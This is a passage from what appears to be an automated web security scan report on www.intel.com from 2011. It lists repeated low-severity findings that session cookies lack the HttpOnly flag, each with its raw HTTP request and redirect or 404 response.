Set-Cookie: INTC_PREVIEW=;expires=Fri, 05-Feb-2010 23:14:56 GMT;path=/
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
...[SNIP]...

12.84. http://www.intel.com/business/home  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.intel.com
Path:   /business/home

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /business/home HTTP/1.1
Host: www.intel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1296947643351; JSESSIONID=D88914679EF85459F2500510E78BDC11.node6IPR; __utmv=; intelresearchSTGref=NONE; AnonymousGuest=B9E7250CFE3F45e9A390C16357BB10EB155; __utmz=1.1296947562.1.1.utmcsr=intel.com|utmccn=(referral)|utmcmd=referral|utmcct=/; countrylang=United%20States%20-%20English; s_sq=intelnewscorp%2Cintelnewsglobal%3D%2526pid%253Dcorp%25253Anewsroom/community/intel_newsroom/%25253Fiid%25253Dftr%25252Bpress%2526pidt%253D1%2526oid%253Dhttp%25253A//www.intel.com/about/corporateresponsibility/index.htm%25253Fiid%25253Dsubhdr%25252Bcr%2526ot%253DA%26intelcorpconsumer%2Cintelcorpglobalconsumer%3D%2526pid%253Dcons%25253A/consumer/index.htm%2526pidt%253D1%2526oid%253Dhttp%25253A//newsroom.intel.com/%25253Fiid%25253Dftr%25252Bpress%2526ot%253DA; ASPSESSIONIDCQTTTSCR=FFEDENPAGHHPMHKNIABOGJAF; s_lv_s=Less%20than%201%20day; gpv_p18=cim%3A/about/corporateresponsibility/index.htm; s_cc=true; intelresearchSTG=sid%3D9968985447329M1296947538033%26stage%3D13; wa_visitId=%7Bbec98047-4063-22c9-9ea2-60a3f75f6fc2%7D; s_vi=[CS]v1|26A6E824051490CF-6000014E40302B1B[CE]; __utma=1.167981993.1296947562.1296947562.1296947562.1; INTELHistoryTracker=http%3A//www.intel.com/%3Fen_US_01:Laptop%2C%20Notebook%2C%20Desktop%2C%20Server%20and%20Embedded%20Processor%20Technology%20-%20Intel,http%3A//www.intel.com/p/en_US/business%3Fiid%3Dgg_work-en_US+home_business_portal:Intel%AE%20Products%20and%20Resources%20for%20Business,http%3A//www.intel.com/consumer/index.htm%3Fiid%3Dgg_play-en_US+home_consumer:Intel%20for%20Consumers,http%3A//www.intel.com/about/index.htm%3Fiid%3Dgg_about-en_US+intel_aboutintel:All%20About%20Intel,http%3A//newsroom.intel.com/community/intel_newsroom/%3Fiid%3Dftr+press:Intel%20Newsroom%20%7C%20Top%20headlines%2C%20breaking%20news%20and%20current%20events%20from%20Intel; __utmc=1; __utmb=1.2.10.1296947562; cf=0;

Response

HTTP/1.1 404 Not Found
Server: IA Web Server
P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa OUR STP ONL UNI COM NAV INT DEM STA PRE"
Content-Type: text/html
Expires: Sat, 05 Feb 2011 23:18:14 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sat, 05 Feb 2011 23:18:14 GMT
Content-Length: 18367
Connection: close
Set-Cookie: ASPSESSIONIDSACRDDSC=MKLFCODABCLJPLBODFGGNBKN; path=/

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
   
<!-- IMPORTANT NOTE TO WEB AUTHORS UPDATING THIS PAGE: Do NOT use .inc files for the header a
...[SNIP]...

12.85. http://www.intel.com/business/index.htm  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.intel.com
Path:   /business/index.htm

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /business/index.htm?iid=gg_en_US+noscript HTTP/1.1
Host: www.intel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1296947643351; JSESSIONID=D88914679EF85459F2500510E78BDC11.node6IPR; __utmv=; intelresearchSTGref=NONE; AnonymousGuest=B9E7250CFE3F45e9A390C16357BB10EB155; __utmz=1.1296947562.1.1.utmcsr=intel.com|utmccn=(referral)|utmcmd=referral|utmcct=/; countrylang=United%20States%20-%20English; s_sq=intelnewscorp%2Cintelnewsglobal%3D%2526pid%253Dcorp%25253Anewsroom/community/intel_newsroom/%25253Fiid%25253Dftr%25252Bpress%2526pidt%253D1%2526oid%253Dhttp%25253A//www.intel.com/about/corporateresponsibility/index.htm%25253Fiid%25253Dsubhdr%25252Bcr%2526ot%253DA%26intelcorpconsumer%2Cintelcorpglobalconsumer%3D%2526pid%253Dcons%25253A/consumer/index.htm%2526pidt%253D1%2526oid%253Dhttp%25253A//newsroom.intel.com/%25253Fiid%25253Dftr%25252Bpress%2526ot%253DA; ASPSESSIONIDCQTTTSCR=FFEDENPAGHHPMHKNIABOGJAF; s_lv_s=Less%20than%201%20day; gpv_p18=cim%3A/about/corporateresponsibility/index.htm; s_cc=true; intelresearchSTG=sid%3D9968985447329M1296947538033%26stage%3D13; wa_visitId=%7Bbec98047-4063-22c9-9ea2-60a3f75f6fc2%7D; s_vi=[CS]v1|26A6E824051490CF-6000014E40302B1B[CE]; __utma=1.167981993.1296947562.1296947562.1296947562.1; INTELHistoryTracker=http%3A//www.intel.com/%3Fen_US_01:Laptop%2C%20Notebook%2C%20Desktop%2C%20Server%20and%20Embedded%20Processor%20Technology%20-%20Intel,http%3A//www.intel.com/p/en_US/business%3Fiid%3Dgg_work-en_US+home_business_portal:Intel%AE%20Products%20and%20Resources%20for%20Business,http%3A//www.intel.com/consumer/index.htm%3Fiid%3Dgg_play-en_US+home_consumer:Intel%20for%20Consumers,http%3A//www.intel.com/about/index.htm%3Fiid%3Dgg_about-en_US+intel_aboutintel:All%20About%20Intel,http%3A//newsroom.intel.com/community/intel_newsroom/%3Fiid%3Dftr+press:Intel%20Newsroom%20%7C%20Top%20headlines%2C%20breaking%20news%20and%20current%20events%20from%20Intel; __utmc=1; __utmb=1.2.10.1296947562; cf=0;

Response

HTTP/1.1 301 Moved Permanently
Server: IA Web Server
P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa OUR STP ONL UNI COM NAV INT DEM STA PRE"
Location: http://www.intel.com/p/en_US/business?iid=gg_en_US+noscript
Content-Length: 21
Content-Type: text/html
Vary: Accept-Encoding
Expires: Sat, 05 Feb 2011 23:18:03 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sat, 05 Feb 2011 23:18:03 GMT
Connection: close
Set-Cookie: ASPSESSIONIDCSQQQQAT=KLJMGNPAGDCGJNDJOJKAGANB; path=/

iid=gg_en_US+noscript

12.86. http://www.intel.com/business/index.htm  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.intel.com
Path:   /business/index.htm

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /business/index.htm?iid=gg_work-en_US+home_business_portal HTTP/1.1
Host: www.intel.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|26A6E824051490CF-6000014E40302B1B[CE]; wa_visitId=%7Bbec98047-4063-22c9-9ea2-60a3f75f6fc2%7D; s_cc=true; s_lv=1296947549093; s_lv_s=Less%20than%201%20day; cf=0; gpv_p18=cim%3A/index.htm; s_sq=%5B%5BB%5D%5D; countrylang=United%20States%20-%20English; INTELHistoryTracker=http%3A//www.intel.com/%3Fen_US_01:Laptop%2C%20Notebook%2C%20Desktop%2C%20Server%20and%20Embedded%20Processor%20Technology%20-%20Intel

Response

HTTP/1.1 301 Moved Permanently
Server: IA Web Server
P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa OUR STP ONL UNI COM NAV INT DEM STA PRE"
Location: http://www.intel.com/p/en_US/business?iid=gg_work-en_US+home_business_portal
Content-Length: 38
Content-Type: text/html
Vary: Accept-Encoding
Expires: Sat, 05 Feb 2011 23:18:03 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sat, 05 Feb 2011 23:18:03 GMT
Connection: close
Set-Cookie: AnonymousGuest=3AACE508C50D4ef1AA271A1728495430947; expires=Fri 28-May-2021 23:59:00 GMT; path=/;
Set-Cookie: ASPSESSIONIDSACRDDSC=JFLFCODAFMNKOAOKFJFJJGLK; path=/

iid=gg_work-en_US+home_business_portal

12.87. http://www.intel.com/business/index.htm  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.intel.com
Path:   /business/index.htm

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /business/index.htm?iid=gg_work-en_US+home_business_portal HTTP/1.1
Host: www.intel.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|26A6E824051490CF-6000014E40302B1B[CE]; wa_visitId=%7Bbec98047-4063-22c9-9ea2-60a3f75f6fc2%7D; s_cc=true; s_lv=1296947549093; s_lv_s=Less%20than%201%20day; cf=0; gpv_p18=cim%3A/index.htm; s_sq=%5B%5BB%5D%5D; countrylang=United%20States%20-%20English; INTELHistoryTracker=http%3A//www.intel.com/%3Fen_US_01:Laptop%2C%20Notebook%2C%20Desktop%2C%20Server%20and%20Embedded%20Processor%20Technology%20-%20Intel

Response

HTTP/1.1 301 Moved Permanently
Server: IA Web Server
P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa OUR STP ONL UNI COM NAV INT DEM STA PRE"
Location: http://www.intel.com/p/en_US/business?iid=gg_work-en_US+home_business_portal
Content-Length: 38
Content-Type: text/html
Vary: Accept-Encoding
Expires: Sat, 05 Feb 2011 23:12:07 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sat, 05 Feb 2011 23:12:07 GMT
Connection: close
Set-Cookie: AnonymousGuest=B9E7250CFE3F45e9A390C16357BB10EB155; expires=Fri 28-May-2021 23:59:00 GMT; path=/;
Set-Cookie: ASPSESSIONIDCQTTTSCR=FFEDENPAGHHPMHKNIABOGJAF; path=/

iid=gg_work-en_US+home_business_portal

12.88. http://www.intel.com/community/index.htm  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.intel.com
Path:   /community/index.htm

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /community/index.htm?iid=subhdr+cr_community HTTP/1.1
Host: www.intel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1296947643351; JSESSIONID=D88914679EF85459F2500510E78BDC11.node6IPR; __utmv=; intelresearchSTGref=NONE; AnonymousGuest=B9E7250CFE3F45e9A390C16357BB10EB155; __utmz=1.1296947562.1.1.utmcsr=intel.com|utmccn=(referral)|utmcmd=referral|utmcct=/; countrylang=United%20States%20-%20English; s_sq=intelnewscorp%2Cintelnewsglobal%3D%2526pid%253Dcorp%25253Anewsroom/community/intel_newsroom/%25253Fiid%25253Dftr%25252Bpress%2526pidt%253D1%2526oid%253Dhttp%25253A//www.intel.com/about/corporateresponsibility/index.htm%25253Fiid%25253Dsubhdr%25252Bcr%2526ot%253DA%26intelcorpconsumer%2Cintelcorpglobalconsumer%3D%2526pid%253Dcons%25253A/consumer/index.htm%2526pidt%253D1%2526oid%253Dhttp%25253A//newsroom.intel.com/%25253Fiid%25253Dftr%25252Bpress%2526ot%253DA; ASPSESSIONIDCQTTTSCR=FFEDENPAGHHPMHKNIABOGJAF; s_lv_s=Less%20than%201%20day; gpv_p18=cim%3A/about/corporateresponsibility/index.htm; s_cc=true; intelresearchSTG=sid%3D9968985447329M1296947538033%26stage%3D13; wa_visitId=%7Bbec98047-4063-22c9-9ea2-60a3f75f6fc2%7D; s_vi=[CS]v1|26A6E824051490CF-6000014E40302B1B[CE]; __utma=1.167981993.1296947562.1296947562.1296947562.1; INTELHistoryTracker=http%3A//www.intel.com/%3Fen_US_01:Laptop%2C%20Notebook%2C%20Desktop%2C%20Server%20and%20Embedded%20Processor%20Technology%20-%20Intel,http%3A//www.intel.com/p/en_US/business%3Fiid%3Dgg_work-en_US+home_business_portal:Intel%AE%20Products%20and%20Resources%20for%20Business,http%3A//www.intel.com/consumer/index.htm%3Fiid%3Dgg_play-en_US+home_consumer:Intel%20for%20Consumers,http%3A//www.intel.com/about/index.htm%3Fiid%3Dgg_about-en_US+intel_aboutintel:All%20About%20Intel,http%3A//newsroom.intel.com/community/intel_newsroom/%3Fiid%3Dftr+press:Intel%20Newsroom%20%7C%20Top%20headlines%2C%20breaking%20news%20and%20current%20events%20from%20Intel; __utmc=1; __utmb=1.2.10.1296947562; cf=0;

Response

HTTP/1.1 301 Moved Permanently
Server: IA Web Server
P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa OUR STP ONL UNI COM NAV INT DEM STA PRE"
Location: http://www.intel.com/about/corporateresponsibility/community/index.htm?iid=subhdr+cr_community
Content-Length: 23
Content-Type: text/html
Vary: Accept-Encoding
Expires: Sat, 05 Feb 2011 23:21:07 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sat, 05 Feb 2011 23:21:07 GMT
Connection: close
Set-Cookie: ASPSESSIONIDSACRDDSC=DBAGCODAFFGOGDMJBAFLEDPO; path=/

iid=subhdr+cr_community

12.89. http://www.intel.com/community/index.htm  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.intel.com
Path:   /community/index.htm

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /community/index.htm HTTP/1.1
Host: www.intel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1296947643351; JSESSIONID=D88914679EF85459F2500510E78BDC11.node6IPR; __utmv=; intelresearchSTGref=NONE; AnonymousGuest=B9E7250CFE3F45e9A390C16357BB10EB155; __utmz=1.1296947562.1.1.utmcsr=intel.com|utmccn=(referral)|utmcmd=referral|utmcct=/; countrylang=United%20States%20-%20English; s_sq=intelnewscorp%2Cintelnewsglobal%3D%2526pid%253Dcorp%25253Anewsroom/community/intel_newsroom/%25253Fiid%25253Dftr%25252Bpress%2526pidt%253D1%2526oid%253Dhttp%25253A//www.intel.com/about/corporateresponsibility/index.htm%25253Fiid%25253Dsubhdr%25252Bcr%2526ot%253DA%26intelcorpconsumer%2Cintelcorpglobalconsumer%3D%2526pid%253Dcons%25253A/consumer/index.htm%2526pidt%253D1%2526oid%253Dhttp%25253A//newsroom.intel.com/%25253Fiid%25253Dftr%25252Bpress%2526ot%253DA; ASPSESSIONIDCQTTTSCR=FFEDENPAGHHPMHKNIABOGJAF; s_lv_s=Less%20than%201%20day; gpv_p18=cim%3A/about/corporateresponsibility/index.htm; s_cc=true; intelresearchSTG=sid%3D9968985447329M1296947538033%26stage%3D13; wa_visitId=%7Bbec98047-4063-22c9-9ea2-60a3f75f6fc2%7D; s_vi=[CS]v1|26A6E824051490CF-6000014E40302B1B[CE]; __utma=1.167981993.1296947562.1296947562.1296947562.1; INTELHistoryTracker=http%3A//www.intel.com/%3Fen_US_01:Laptop%2C%20Notebook%2C%20Desktop%2C%20Server%20and%20Embedded%20Processor%20Technology%20-%20Intel,http%3A//www.intel.com/p/en_US/business%3Fiid%3Dgg_work-en_US+home_business_portal:Intel%AE%20Products%20and%20Resources%20for%20Business,http%3A//www.intel.com/consumer/index.htm%3Fiid%3Dgg_play-en_US+home_consumer:Intel%20for%20Consumers,http%3A//www.intel.com/about/index.htm%3Fiid%3Dgg_about-en_US+intel_aboutintel:All%20About%20Intel,http%3A//newsroom.intel.com/community/intel_newsroom/%3Fiid%3Dftr+press:Intel%20Newsroom%20%7C%20Top%20headlines%2C%20breaking%20news%20and%20current%20events%20from%20Intel; __utmc=1; __utmb=1.2.10.1296947562; cf=0;

Response

HTTP/1.1 301 Moved Permanently
Server: IA Web Server
P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa OUR STP ONL UNI COM NAV INT DEM STA PRE"
Location: http://www.intel.com/about/corporateresponsibility/community/index.htm
Content-Length: 0
Content-Type: text/html
Vary: Accept-Encoding
Expires: Sat, 05 Feb 2011 23:21:07 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sat, 05 Feb 2011 23:21:07 GMT
Connection: close
Set-Cookie: ASPSESSIONIDCSQQQQAT=JLOMGNPALGCDMHBBIDKDCNKJ; path=/


12.90. http://www.intel.com/consumer/learn/processors/index.htm  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.intel.com
Path:   /consumer/learn/processors/index.htm

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /consumer/learn/processors/index.htm?iid=gg_play+learn_processors HTTP/1.1
Host: www.intel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1296947643351; JSESSIONID=D88914679EF85459F2500510E78BDC11.node6IPR; __utmv=; intelresearchSTGref=NONE; AnonymousGuest=B9E7250CFE3F45e9A390C16357BB10EB155; __utmz=1.1296947562.1.1.utmcsr=intel.com|utmccn=(referral)|utmcmd=referral|utmcct=/; countrylang=United%20States%20-%20English; s_sq=intelnewscorp%2Cintelnewsglobal%3D%2526pid%253Dcorp%25253Anewsroom/community/intel_newsroom/%25253Fiid%25253Dftr%25252Bpress%2526pidt%253D1%2526oid%253Dhttp%25253A//www.intel.com/about/corporateresponsibility/index.htm%25253Fiid%25253Dsubhdr%25252Bcr%2526ot%253DA%26intelcorpconsumer%2Cintelcorpglobalconsumer%3D%2526pid%253Dcons%25253A/consumer/index.htm%2526pidt%253D1%2526oid%253Dhttp%25253A//newsroom.intel.com/%25253Fiid%25253Dftr%25252Bpress%2526ot%253DA; ASPSESSIONIDCQTTTSCR=FFEDENPAGHHPMHKNIABOGJAF; s_lv_s=Less%20than%201%20day; gpv_p18=cim%3A/about/corporateresponsibility/index.htm; s_cc=true; intelresearchSTG=sid%3D9968985447329M1296947538033%26stage%3D13; wa_visitId=%7Bbec98047-4063-22c9-9ea2-60a3f75f6fc2%7D; s_vi=[CS]v1|26A6E824051490CF-6000014E40302B1B[CE]; __utma=1.167981993.1296947562.1296947562.1296947562.1; INTELHistoryTracker=http%3A//www.intel.com/%3Fen_US_01:Laptop%2C%20Notebook%2C%20Desktop%2C%20Server%20and%20Embedded%20Processor%20Technology%20-%20Intel,http%3A//www.intel.com/p/en_US/business%3Fiid%3Dgg_work-en_US+home_business_portal:Intel%AE%20Products%20and%20Resources%20for%20Business,http%3A//www.intel.com/consumer/index.htm%3Fiid%3Dgg_play-en_US+home_consumer:Intel%20for%20Consumers,http%3A//www.intel.com/about/index.htm%3Fiid%3Dgg_about-en_US+intel_aboutintel:All%20About%20Intel,http%3A//newsroom.intel.com/community/intel_newsroom/%3Fiid%3Dftr+press:Intel%20Newsroom%20%7C%20Top%20headlines%2C%20breaking%20news%20and%20current%20events%20from%20Intel; __utmc=1; __utmb=1.2.10.1296947562; cf=0;

Response

HTTP/1.1 301 Moved Permanently
Server: IA Web Server
P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa OUR STP ONL UNI COM NAV INT DEM STA PRE"
Location: http://www.intel.com/consumer/products/processors/index.htm?iid=gg_play+learn_processors
Content-Length: 28
Content-Type: text/html
Vary: Accept-Encoding
Expires: Sat, 05 Feb 2011 23:19:54 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sat, 05 Feb 2011 23:19:54 GMT
Connection: close
Set-Cookie: ASPSESSIONIDCSQQQQAT=JCMMGNPALJMKIOBDAJLFFGEM; path=/

iid=gg_play+learn_processors

12.91. http://www.intel.com/consumer/learn/processors/index.htm  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.intel.com
Path:   /consumer/learn/processors/index.htm

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /consumer/learn/processors/index.htm HTTP/1.1
Host: www.intel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1296947643351; JSESSIONID=D88914679EF85459F2500510E78BDC11.node6IPR; __utmv=; intelresearchSTGref=NONE; AnonymousGuest=B9E7250CFE3F45e9A390C16357BB10EB155; __utmz=1.1296947562.1.1.utmcsr=intel.com|utmccn=(referral)|utmcmd=referral|utmcct=/; countrylang=United%20States%20-%20English; s_sq=intelnewscorp%2Cintelnewsglobal%3D%2526pid%253Dcorp%25253Anewsroom/community/intel_newsroom/%25253Fiid%25253Dftr%25252Bpress%2526pidt%253D1%2526oid%253Dhttp%25253A//www.intel.com/about/corporateresponsibility/index.htm%25253Fiid%25253Dsubhdr%25252Bcr%2526ot%253DA%26intelcorpconsumer%2Cintelcorpglobalconsumer%3D%2526pid%253Dcons%25253A/consumer/index.htm%2526pidt%253D1%2526oid%253Dhttp%25253A//newsroom.intel.com/%25253Fiid%25253Dftr%25252Bpress%2526ot%253DA; ASPSESSIONIDCQTTTSCR=FFEDENPAGHHPMHKNIABOGJAF; s_lv_s=Less%20than%201%20day; gpv_p18=cim%3A/about/corporateresponsibility/index.htm; s_cc=true; intelresearchSTG=sid%3D9968985447329M1296947538033%26stage%3D13; wa_visitId=%7Bbec98047-4063-22c9-9ea2-60a3f75f6fc2%7D; s_vi=[CS]v1|26A6E824051490CF-6000014E40302B1B[CE]; __utma=1.167981993.1296947562.1296947562.1296947562.1; INTELHistoryTracker=http%3A//www.intel.com/%3Fen_US_01:Laptop%2C%20Notebook%2C%20Desktop%2C%20Server%20and%20Embedded%20Processor%20Technology%20-%20Intel,http%3A//www.intel.com/p/en_US/business%3Fiid%3Dgg_work-en_US+home_business_portal:Intel%AE%20Products%20and%20Resources%20for%20Business,http%3A//www.intel.com/consumer/index.htm%3Fiid%3Dgg_play-en_US+home_consumer:Intel%20for%20Consumers,http%3A//www.intel.com/about/index.htm%3Fiid%3Dgg_about-en_US+intel_aboutintel:All%20About%20Intel,http%3A//newsroom.intel.com/community/intel_newsroom/%3Fiid%3Dftr+press:Intel%20Newsroom%20%7C%20Top%20headlines%2C%20breaking%20news%20and%20current%20events%20from%20Intel; __utmc=1; __utmb=1.2.10.1296947562; cf=0;

Response

HTTP/1.1 301 Moved Permanently
Server: IA Web Server
P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa OUR STP ONL UNI COM NAV INT DEM STA PRE"
Location: http://www.intel.com/consumer/products/processors/index.htm
Content-Length: 0
Content-Type: text/html
Vary: Accept-Encoding
Expires: Sat, 05 Feb 2011 23:19:54 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sat, 05 Feb 2011 23:19:54 GMT
Connection: close
Set-Cookie: ASPSESSIONIDCSRQSQAR=IICLKMPAPACPLDCOBKFLHJBN; path=/


12.92. http://www.intel.com/design/index.htm  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.intel.com
Path:   /design/index.htm

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /design/index.htm?iid=gg_work+home_developer HTTP/1.1
Host: www.intel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1296947643351; JSESSIONID=D88914679EF85459F2500510E78BDC11.node6IPR; __utmv=; intelresearchSTGref=NONE; AnonymousGuest=B9E7250CFE3F45e9A390C16357BB10EB155; __utmz=1.1296947562.1.1.utmcsr=intel.com|utmccn=(referral)|utmcmd=referral|utmcct=/; countrylang=United%20States%20-%20English; s_sq=intelnewscorp%2Cintelnewsglobal%3D%2526pid%253Dcorp%25253Anewsroom/community/intel_newsroom/%25253Fiid%25253Dftr%25252Bpress%2526pidt%253D1%2526oid%253Dhttp%25253A//www.intel.com/about/corporateresponsibility/index.htm%25253Fiid%25253Dsubhdr%25252Bcr%2526ot%253DA%26intelcorpconsumer%2Cintelcorpglobalconsumer%3D%2526pid%253Dcons%25253A/consumer/index.htm%2526pidt%253D1%2526oid%253Dhttp%25253A//newsroom.intel.com/%25253Fiid%25253Dftr%25252Bpress%2526ot%253DA; ASPSESSIONIDCQTTTSCR=FFEDENPAGHHPMHKNIABOGJAF; s_lv_s=Less%20than%201%20day; gpv_p18=cim%3A/about/corporateresponsibility/index.htm; s_cc=true; intelresearchSTG=sid%3D9968985447329M1296947538033%26stage%3D13; wa_visitId=%7Bbec98047-4063-22c9-9ea2-60a3f75f6fc2%7D; s_vi=[CS]v1|26A6E824051490CF-6000014E40302B1B[CE]; __utma=1.167981993.1296947562.1296947562.1296947562.1; INTELHistoryTracker=http%3A//www.intel.com/%3Fen_US_01:Laptop%2C%20Notebook%2C%20Desktop%2C%20Server%20and%20Embedded%20Processor%20Technology%20-%20Intel,http%3A//www.intel.com/p/en_US/business%3Fiid%3Dgg_work-en_US+home_business_portal:Intel%AE%20Products%20and%20Resources%20for%20Business,http%3A//www.intel.com/consumer/index.htm%3Fiid%3Dgg_play-en_US+home_consumer:Intel%20for%20Consumers,http%3A//www.intel.com/about/index.htm%3Fiid%3Dgg_about-en_US+intel_aboutintel:All%20About%20Intel,http%3A//newsroom.intel.com/community/intel_newsroom/%3Fiid%3Dftr+press:Intel%20Newsroom%20%7C%20Top%20headlines%2C%20breaking%20news%20and%20current%20events%20from%20Intel; __utmc=1; __utmb=1.2.10.1296947562; cf=0;

Response

HTTP/1.1 301 Moved Permanently
Server: IA Web Server
P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa OUR STP ONL UNI COM NAV INT DEM STA PRE"
Location: http://www.intel.com/p/en_US/business/design?iid=gg_work+home_developer
Content-Length: 26
Content-Type: text/html
Vary: Accept-Encoding
Expires: Sat, 05 Feb 2011 23:19:35 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sat, 05 Feb 2011 23:19:35 GMT
Connection: close
Set-Cookie: ASPSESSIONIDCSRQSQAR=GNBLKMPAFHLKMADCLBGOHLPO; path=/

iid=gg_work+home_developer

12.93. http://www.intel.com/design/index.htm  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.intel.com
Path:   /design/index.htm

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /design/index.htm HTTP/1.1
Host: www.intel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1296947643351; JSESSIONID=D88914679EF85459F2500510E78BDC11.node6IPR; __utmv=; intelresearchSTGref=NONE; AnonymousGuest=B9E7250CFE3F45e9A390C16357BB10EB155; __utmz=1.1296947562.1.1.utmcsr=intel.com|utmccn=(referral)|utmcmd=referral|utmcct=/; countrylang=United%20States%20-%20English; s_sq=intelnewscorp%2Cintelnewsglobal%3D%2526pid%253Dcorp%25253Anewsroom/community/intel_newsroom/%25253Fiid%25253Dftr%25252Bpress%2526pidt%253D1%2526oid%253Dhttp%25253A//www.intel.com/about/corporateresponsibility/index.htm%25253Fiid%25253Dsubhdr%25252Bcr%2526ot%253DA%26intelcorpconsumer%2Cintelcorpglobalconsumer%3D%2526pid%253Dcons%25253A/consumer/index.htm%2526pidt%253D1%2526oid%253Dhttp%25253A//newsroom.intel.com/%25253Fiid%25253Dftr%25252Bpress%2526ot%253DA; ASPSESSIONIDCQTTTSCR=FFEDENPAGHHPMHKNIABOGJAF; s_lv_s=Less%20than%201%20day; gpv_p18=cim%3A/about/corporateresponsibility/index.htm; s_cc=true; intelresearchSTG=sid%3D9968985447329M1296947538033%26stage%3D13; 